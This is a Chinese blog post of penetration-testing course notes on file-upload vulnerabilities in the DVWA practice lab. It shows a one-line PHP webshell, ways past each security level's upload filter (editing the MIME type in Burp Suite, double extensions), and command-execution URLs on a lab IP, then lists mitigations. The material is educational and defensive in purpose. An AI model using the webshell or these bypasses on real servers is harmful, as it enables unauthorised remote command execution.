Kali Linux渗透测试 088 手动漏洞挖掘-文件上传漏洞

最新推荐文章于 2024-06-23 15:43:40 发布
最新推荐文章于 2024-06-23 15:43:40 发布
阅读量2.8k 收藏 5
点赞数 2
分类专栏: kali-linux 文章标签: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/79656758
版权

本文记录 Kali Linux 2018.1 学习使用和渗透测试的详细过程,教程为安全牛课堂里的《Kali Linux 渗透测试》课程

Kali Linux渗透测试(苑房弘)博客记录

1. 文件上传漏洞
2. 测试文件上传漏洞
    2-1. 正常模式
    2-2. 测试 dvwa Low 安全级别
        2-2-1. 测试漏洞
        2-2-2. 使用 BurpSuite 进行抓包
2-3. 测试 dvwa Medium 安全级别
    2-3-1. 测试漏洞
    2-3-2. 使用 BurpSui
2-4. 测试 dvwa High 安全级别
    2-4-1. 测试漏洞
    2-4-2. 使用 BurpSuite 进行抓包
3. 高安全性解决办法
    3-1. 解决办法
    3-2. 进行测试攻击
4. 多方面的解决办法

1. 文件上传漏洞

  • php 代码

    <?php echo shell_exec($_GET['cmd']);?>

  • 直接上传 webshell

  • 修改文件类型上传 webshell

    • mimetype 文件头、扩展名

  • 修改扩展名上传 webshell

    • 静态解析文件扩展名可能无法执行

  • 文件头绕过过滤文件上传 webshell

  • 删除目录执行权限增加安全性

2. 测试文件上传漏洞

0. 正常模式

1. 测试 dvwa Low 安全级别

1. 测试漏洞

  1. 新建 test.php 文件

    root@kali:~/Desktop# cat test.php

2. 使用 BurpSuite 进行抓包

  1. 关闭截断功能

  2. 浏览器配置 BurpSuite 代理

  3. 执行文件上传操作并且查看数据包



  4. 数据包中规定有文件大小限制,规定只能上传 100000 (100K)字节以内的文件,通过截断代理功能修改参数




2. 测试 dvwa Medium 安全级别

1. 测试漏洞

  1. 上传大小合适的 .png 图片文件

  2. 查看源代码

    #发现对问价格式和文件大小都进行了过滤
 <?php
    if (isset($_POST['Upload'])) {
            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename($_FILES['uploaded']['name']);
            $uploaded_name = $_FILES['uploaded']['name'];
            $uploaded_type = $_FILES['uploaded']['type'];
            $uploaded_size = $_FILES['uploaded']['size'];
            if (($uploaded_type == "image/jpeg") && ($uploaded_size < 100000)){
                if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {
                    echo '<pre>';
                    echo 'Your image was not uploaded.';
                    echo '</pre>';
                  } else {
                    echo '<pre>';
                    echo $target_path . ' succesfully uploaded!';
                    echo '</pre>';
                    }
            }
            else{
                echo '<pre>Your image was not uploaded.</pre>';
            }
        }
?>

2. 使用 BurpSuite 进行抓包

  1. 开启截断代理


  2. 上传 test.php,文件大小合适,类型不合适



  3. 关闭截断代理,测试漏洞

    10.10.10.132/dvwa/vulnerabilities/upload/../../hackable/uploads/test.php
http://10.10.10.132/dvwa/hackable/uploads/test.php?cmd=id

3. 测试 dvwa High 安全级别

1. 测试漏洞

  1. mimetype 查看文件格式

    root@kali:~/Desktop# mimetype 22.png 
22.png: image/png
root@kali:~/Desktop# mv 22.png 22.jpg
root@kali:~/Desktop# mimetype 22.jpg 
22.jpg: image/jpeg

先查看文件前十个字节判断是image,
然后使用文件后缀名判断具体文件格式。

root@kali:~/Desktop# mimetype 11.php 
11.php: application/x-php
root@kali:~/Desktop# mv 11.php 11.jpg
root@kali:~/Desktop# mimetype 11.jpg 
11.jpg: application/x-php

  2. 查看源码

    # 发现是完全按照文件真实扩展名来判断的
<?php
if (isset($_POST['Upload'])) {
            $target_path = DVWA_WEB_PAGE_TO_ROOT."hackable/uploads/";
            $target_path = $target_path . basename($_FILES['uploaded']['name']);
            $uploaded_name = $_FILES['uploaded']['name'];
            $uploaded_ext = substr($uploaded_name, strrpos($uploaded_name, '.') + 1);
            $uploaded_size = $_FILES['uploaded']['size'];

            if (($uploaded_ext == "jpg" || $uploaded_ext == "JPG" || $uploaded_ext == "jpeg" || $uploaded_ext == "JPEG") && ($uploaded_size < 100000)){

                if(!move_uploaded_file($_FILES['uploaded']['tmp_name'], $target_path)) {   
                    echo '<pre>';
                    echo 'Your image was not uploaded.';
                    echo '</pre>';
                  } else {
                    echo '<pre>';
                    echo $target_path . ' succesfully uploaded!';
                    echo '</pre>';  
                    }
            }
            else{
                echo '<pre>';
                echo 'Your image was not uploaded.';
                echo '</pre>';
            }
        }
?>

2. 使用 BurpSuite 进行抓包

  1. 测试修改文件类型,开启截断代理




  2. 测试添加后缀文件类型

    在文件名后面添加 .jpg

  3. 测试漏洞

    http://10.10.10.132/dvwa/hackable/uploads/test.php.jpg?cmd=id

3. 高安全性解决办法

1. 解决办法

对文件的内容头信息(文件前十个字节)进行过滤,判断文件头信息里是否是真实的文件类型

2. 进行测试攻击

  1. 删除 dvwa 多余文件

    root@metasploitable:/var/www/dvwa/hackable/uploads# ls
dvwa_email.png

  2. 上传文件,截断代理

    此安全性防护级别已经超越了 dvwa 的 High 防护级别


  3. 漏洞利用

    http://10.10.10.132/dvwa/hackable/uploads/icon-console.php.jpeg?cmd=id

4. 多方面的解决办法

  1. 在服务器端对文件扩展名进行静态解析

  2. 对目录权限进行设置(删除执行权限)

    root@metasploitable:/var/www/dvwa/hackable# ll -d uploads/    
drwxr-xr-x 2 www-data www-data 4096 Mar  3 16:27 uploads/
root@metasploitable:/var/www/dvwa/hackable# chmod a-x uploads/
root@metasploitable:/var/www/dvwa/hackable# ll -d uploads/    
drw-r--r-- 2 www-data www-data 4096 Mar  3 16:27 uploads/

网络安全打工人
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali Linux渗透测试(安全牛).txt
04-17
├─第1章 课程介绍 │ 任务001:Kali Linux渗透测试介绍.mp4 │ ├─第2章 Kali安装 │ 任务002:Kali Linux安装-硬盘安装、虚拟机安装.mp4 │ 任务003:Kali Linux 安装-持久加密USB安装、熟悉环境、熟悉BASH命令.mp4 │ 任务004:Kali Linux安装-熟悉环境.mp4 │ ├─第3章 工作环境优化 │ 任务005:网络配置、更新升级、安装软件包、浏览器插件.mp4 │ 任务006:安装Java、安装显卡驱动、安装网卡补丁、并发线程限制、电源优化.mp4 │ 任务007:.mp4 │ 任务008:.mp4 │ ├─第4章 实验环境 │ 任务009:实验环境.mp4 │ ├─章 基本工具 │ 任务010:基本工具-NETCAT(telnet-banner、传输文本信息).mp4 │ 任务011:基本工具-NETCAT(传输-目录、流媒体服务、端口扫描、远程克隆硬盘).mp4 │ 任务012:基本工具-远程控制、NCAT、WIRESHARK、WIRESHARK-筛选器、常见协议.mp4 │ 任务013:基本工具-常见协议包、WIRESHARK-TCP.mp4 │ 任务014:WIRESHARK-信息统计、实践.mp4 │ 任务015:TCPDUMP-抓包、筛选、高级筛选、过程文档记录.mp4 │ ├─章 信息收集 │ 任务016:被动信息收集:信息收集内容、信息用途、信息收集DNS、DNS信息收集-NSLOOKUP.mp4 │ 任务017:DNS信息收集-DIGmp4.mp4 │ 任务018:DNS区域传输、DNS字典爆破、DNS信息.mp4 │ 任务019:搜索引擎、SHODAN.mp4 │ 任务020:SHODAN.mp4 │ 任务021:google搜索:实例.mp4 │ 任务022:其他途径.mp4 │ 任务023:RECON-NG.mp4 │ ├─章 主动信息收集 │ 任务024:主动信息收集-发现.mp4 │ 任务025:主动信息收集-发现(二).mp4 │ 任务026:主动信息收集-发现(三).mp4 │ 任务027:主动信息收集-发现(四).mp4 │ 任务028:主动信息收集-发现(五).mp4 │ 任务029:端口扫描.mp4 │ 任务030:端口扫描(二).mp4 │ 任务031:服务扫描.mp4 │ 任务032:操作系统识别.mp4 │ 任务033:SMB扫描.mp4 │ 任务034:SMTP扫描.mp4 │ ├─章 弱点扫描 │ 任务035:弱点扫描.mp4 │ 任务036:NMAP.mp4 │ 任务037:NESSUS.mp4 │ 任务038:NEXPOSE.mp4 │ ├─章 缓冲区溢出 │ 任务039:缓冲区溢出.mp4 │ 任务040:POP3.mp4 │ 任务041:FUZZING.mp4 │ 任务042:Linux缓冲区溢出.mp4 │ 任务043:选择和修改EXP.mp4 | ├─章 提权 │ 任务45: 抓包嗅探.mp4 │ 任务46: WCE.mp4 │ 任务47: 利用漏洞提权.mp │ 任务48: 利用配置不当提权.mp4 │ 任务49: 收集敏感数据、隐藏痕迹.mp4 │ ├─章 无线 │ 任务050:无线渗透.mp4 │ 任务051:无线网运行模式和无线网硬件设备及基本概念.mp4 │ 任务052:无线技术概念.mp4 │ 任务053:Linux 无线协议栈及配置命令.mp4 │ 任务054:RADIOTAP头部.mp4 │ 任务055:CONTROL FRAME.mp4 │ 任务056:MANAGEMENT FRAME 管理帧.mp4 │ 任务057:REASSOCIATION REQUEST FRAME.mp4 │ 任务058:WEP加密、RC4算法.mp4 │ 任务059:WPA安全系统.mp4 │ 任务060:交换、无线渗透实操:AIRCRACK-NG基础、AIRODUMP-NG排错.mp4 │ 任务061:AIREPLAY-NG.mp4 │ 任务062:Mac地址绑定.mp4 │ 任务063:WPA.mp4 │ 任务064:COWPATTY 密码.mp4 │ 任务065:WPS.mp4 │ 任务066:WPS及其他工具.mp4 │ 任务067:EVIL TWIN AP、ROGUE AP.mp4 │ 任务068:AIRRACK-NG SUITE.mp4 │ 任务069:AIRRACK-NG(二).mp4 │ ├─章 补充 │ 任务070:协议分析.mp4 │ ├─第13章 Web渗透 │ 任务071:HTTP协议基础.mp4 │ 任务072:扫描工具-Nikto.mp4 │ 任务073:vega.mp4 │ 任务074:skipfish.mp4 │ 任务075:w3af.mp4 │ 任务076:w3af-身份认证.mp4 │ 任务077:w3af-截断.mp4 │ 任务078:Arachni.mp4 │ 任务079:OWASP_ZAP.mp4 │ 任务080:Burpsuite.mp4 │ 任务081:Burpsuite-intruder.mp4 │ 任务082:Burpsuite-repeater,Sequencer,编码,截断工具.mp4 │ 任务083:ACUNETIX WEB VULNERABILITY SCANNER.mp4 │ 任务084:APPSCAN.mp4 │ 任务085:答疑(Conky、、Linux4.4内核发布),手动漏洞挖掘.mp4 │ 任务086:手动漏洞挖掘(二).mp4 │ 任务087:手动漏洞挖掘(三).mp4 │ 任务088手动漏洞挖掘(四).mp4 │ 任务089:KALI版本更新(第一个ROLLING RELEASE)和手动漏洞挖掘(SQL注入).mp4 │ 任务090:手动漏洞挖掘-SQL注入.mp4 │ 任务091:手动漏洞挖掘-SQL注入.mp4 │ 任务092:手动漏洞挖掘-SQL盲注.mp4 │ 任务093:SQLMAP- 自动注入.mp4 │ 任务094:SQLMAP自动注入-REQUEST.mp4 │ 任务095:SQLMAP自动注入(二)-REQUEST和SQLMAP自动注入(三)-OPTIMIZATION.mp4 │ 任务096:SQLMAP自动注入-INHECTION、DETECTION、TECHNIQUES、FINGERPRINT.mp4 │ 任务097:SQLMAP自动注入-ENUMERATION、BRUTE FORCE、UDF INJECTION、FILE SYSTEM、OS、WINDOWS REGISTORY、GENERAL、MISCELLANEOUS.mp4 │ 任务098:XSS-简介、跨站脚本检测和常见的利用手段.mp4 │ 任务099:XSS- 键盘记录器和反射型XSS.mp4 │ 任务100:存储型XSS和BEEF浏览器框架.mp4 │ 任务101:CSRF.mp4 │ 任务102:WEBSHELL.mp4 │ 任务103:HTTPS.mp4 │ 任务104:SSL、TLS中间人.mp4 │ 任务105:SSL、TLS拒绝服务和补充概念.mp4 │ ├─第14章 密码 │ 任务106:思路、身份认证方法、密码方法、字典.mp4 │ 任务107:字典、在线密码-hydra.mp4 │ 任务108:在线密码-hydra、在线密码-medusa、离线密码.mp4 │ 任务109:离线密码、离线密码-Hashcat.mp4 │ 任务110:离线密码.mp4 │ 任务111:密码嗅探(第四版剪辑版).mp4 │ 任务112:密码嗅探、中间人.mp4 │ 任务113:中间人、ARP MITM、中间人、Pass the Hash.mp4 │ ├─第15章 流量操控与隧道 │ 任务114:流量操控技术、重定向.mp4 │ 任务115:SSH隧道和SSH本地端口转发.mp4 │ 任务116:SSH远程端口转发和动态端口转发以及X协议转发.mp4 │ 任务117:DNS协议隧道、DNS协议隧道-dns2tcp.mp4 │ 任务118:DNS协议隧道-dns2tcp.mp4 │ 任务119:DNS协议隧道-iodine、NCAT.mp4 │ 任务120:SOCAT.mp4 │ 任务121:ptunnle.mp4 │ 任务122:proxytunnle.mp4 │ 任务123:sslh.mp4 │ 任务124:补充Proxytunnel、stunnel4.mp4 │ ├─第16章 拒绝服务 │ 任务125:拒绝服务介绍、DoS分类、个人DoS分类方法.mp4 │ 任务126:Syn-Flood、IP地址欺骗.mp4 │ 任务127:Smurf、Sockstress.mp4 │ 任务128:TearDrop.mp4 │ 任务129:DNS放大.mp4 │ 任务130:SNMP放大.mp4 │ 任务131:NTP放大.mp4 │ 任务132:应用层Dos.mp4 │ 任务133:拒绝服务工具-RUDY、Hping3、LAND、Siege.mp4 │ 任务134:拒绝服务工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye.mp4 │ ├─第17章 免杀 │ 任务135:恶意软件、防软件、免杀技术、当前现状.mp4 │ 任务136:当前现状、软件保护,自己编写后门.mp4 │ 任务137:Veil-evasion.mp4 │ 任务138:Veil-catapult.mp4 │ 任务139:Veil-catapult总结、另一种免杀思路、shellter.mp4 │ 任务140:Backdoor-f
50-50.渗透测试-Kali Linux漏洞利用
05-10
50-50.渗透测试-Kali Linux漏洞利用
Kali学习笔记38:文件上传漏洞
weixin_30319153的博客
02-09 344
早些年,提到Web渗透,或者搜索一些黑客教程 基本都会看到文件上传漏洞。 它是一个很经典的漏洞 但它本质其实不是一个漏洞,而是网站本身的上传文件功能 不过如果我们上传了Webshell,那么就成为了文件上传漏洞 打开我们的靶机Metasploitable: 这里就是我们可以测试文件上传的地方 我们先在低安全级别的情况下测试 首先我们上传一个正常的图片文件; ...
Web渗透:文件上传漏洞
最新发布
WolvenSec的博客
06-23 692
这段代码的主要功能是通过检查文件扩展名,确保用户上传的文件符合预期(["jpg","png","gif"];)的格式要求。如果文件的扩展名不在允许的列表中,用户将看到一个警告消息,并且页面会重新加载。
网络安全基础——文件上传漏洞
qq_45726460的博客
08-30 405
docker run -it -d -p81:80 74865f11429f /start.sh 启动容器(对应端口冲突需要stop)docker import ezezupload.tar ezezupload—test 导入tar包为镜像(lamp包)结果:本机可以成功访问靶场192.168.194.139:81 显示登录页面,登录账号和密码未知。上传一个图片木马文件,并且进行下载构成新图片,两个对比,说明必须上传一个双写文件。成功上传一个双写文件,bp抓包 ,成功解析pht文件(用中国蚁剑连接)
linux文件上传白名单绕过,【漏洞详解】基于文件上传点挖掘存储型XSS漏洞
weixin_39575502的博客
05-15 855
原标题:【漏洞详解】基于文件上传点挖掘存储型XSS漏洞说到文件上传漏洞,常见的姿势是是尝试利用上传木马 Getshell。但是,在挖漏时很少碰到可以顺利上传木马的点,一般都是卡在某一步(服务器白名单过滤、已上传木马文件找不到路径、无法解析……),然后不了了之……而实际上,对于文件上传的功能点,我们还可以进一步尝试进行存储型 XSS 跨站脚本攻击,往往会有意想不到的惊喜!本文将对其进行介绍。PART...
Linux 判断文件成功上传,Kali Linux系统利用DVWA靶场进测试文件上传漏洞:
weixin_31693025的博客
05-15 416
文件上传漏洞:漏洞原因是由于开发人员或者网站运维人员的一些失误导致用户上传的文件可以被服务器当作脚本执行文件解析执行,但是想要成功利用这个漏洞至少需要满足三个条件:1.有效上传点;2.上传文件能够被解析执行;3.上传文件能够被访问到.Low安全级别源代码:if( isset( $_POST[ 'Upload' ] ) ) {// Where are we going to be writing t...
49-49.渗透测试-Kali Linux漏洞扫描.mp4
05-10
49-49.渗透测试-Kali Linux漏洞扫描.mp4
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part1.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
kali-linux-2021.3-installer-amd64.part4.rar
09-29
Kali Linux预装了许多渗透测试软件,包括nmap 、Wireshark 、John the Ripper,以及Aircrack-ng.[2] 用户可通过硬盘、live CD或live USB运行Kali LinuxKali Linux既有32位和64位的镜像。可用于x86 指令集。同时...
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.part3.rar)
06-14
Kali Linux VMware(kali-linux-2022.2-vmware-amd64.7z)文件分割成 3个 压缩包,必须集齐3个 文件后才能一起解压一起使用: kali-linux-2022.2-vmware-amd64.part1.rar ... kali-linux-2022.2-vmware-amd64.part2.rar...
Kali Linux安全测试(安全牛收费版)课件
04-05
安全牛中价值599元课程的课件,可以让你通过看课件快速的掌握。
Kali渗透测试(七)—— DVWA文件上传漏洞利用
Bulldozer_GD的博客
06-04 2132
Kali linux渗透测试—— 文件上传 一 简介: 上传的文件对应用程序构成了重大风险。 许多攻击的第一步是向要攻击的系统获取一些代码。 然后,攻击仅需要找到一种方法来执行代码。 使用文件上传可帮助攻击者完成第一步。 无限制文件上传的后果可能会有所不同,包括完整的系统接管,文件系统过载,将攻击转发到后端系统以及简单的破坏。 这取决于应用程序如何处理上传的文件,包括文件的存储位置。 主要利用方式 1.直接上传 webshell 2.修改文件类型上传 webshell:mimetype 文件头、扩展名 3.
文件上传漏洞详解
jazzz98的博客
05-08 817
文件上传漏洞是指用户上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务器端命令的能力。这种攻击方式是最为直接和有效的,“文件上传”本身没有问题,有问题的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果.
文件上传漏洞2
nigo134的博客
03-22 6662
检查后缀型上传漏洞>客户端js检查 漏洞原理 有些系统只是在客户端使用js对上传文件的后缀进行检查,服务端没有进行检查。由于客户端的js用户可以禁用,修改等等,导 致可以绕过客户端的检测,上传不合法文件。漏洞利用 1.将js禁用 2.修改客户端的js 3.上传合法后缀,使用burp抓包,再改后缀。 检查后缀型上传漏洞>服务端MIME检查 漏洞原理 有些系统只是在客户端使用js对上传文件的后缀进行检查,服务端没有进行检查。由于客户端的js用户可以禁用,修改等等,导致可以绕过客户端的检测,上传
文件上传漏洞——漏洞解析汇总
cldimd的博客
03-20 1113
1、.htaccess文件突破上传 该方法使用的前提: 没有禁止.htaccess文件的上传,且服务商允许用户使用自定义.htaccess文件。 原理: .htaccess文件(或者"分布式配置文件"),全称是Hypertext Access(超文本入口)。提供了针对目录改变配置的方法, 即,在一个特定的文档目录中放置一个包...
Kali Linux学习笔记—Web渗透(2-3)手动漏洞挖掘
weixin_43653897的博客
12-16 1118
手动漏洞挖掘身份认证 账号密码层面会话sessionID密码找回漏洞挖掘原则目录遍历 / 文件包含 matesploitable:172.16.2.65 kali linux:172.16.2.63 身份认证 账号密码层面 常用弱口令/基于字典的密码爆破 锁定账号 信息手机 手机号 密码错误提示信息 密码嗅探 如果有不一样,可将其右键发送到intruder加入变量 会话sessionID Xss / cookie importer SessionID in URL 嗅探 SessionID
上传漏洞的另类突破姿势(针对Linux
大方子
08-02 2322
=========================================== 个人收获: 1.在Linux系统下上传文件可以尝试通过111.php&amp;amp;#x2e;jpg的格式绕过上传限制   ===========================================       昨晚培训的时候遇到一个客户站,这个站的上传比较有意思,于是就突破一下看...
kali linux安全牛教程,Kali Linux渗透测试(安全牛)最新完整版教程160G
weixin_33576058的博客
05-02 1321
Kali LinuxKali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。Kali Linux预装了许多渗透测试软件,包...
Kali Linux渗透测试实战指南
"Kali Linux 渗透测试实训手册,包含Kali中各种工具的使用方法,适合初学者通过实践操作快速掌握渗透测试技能。书中提供了详细的实例解析,包括安装Kali、Windows、Metasploit等系统,以及使用各种必备工具如VMware...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值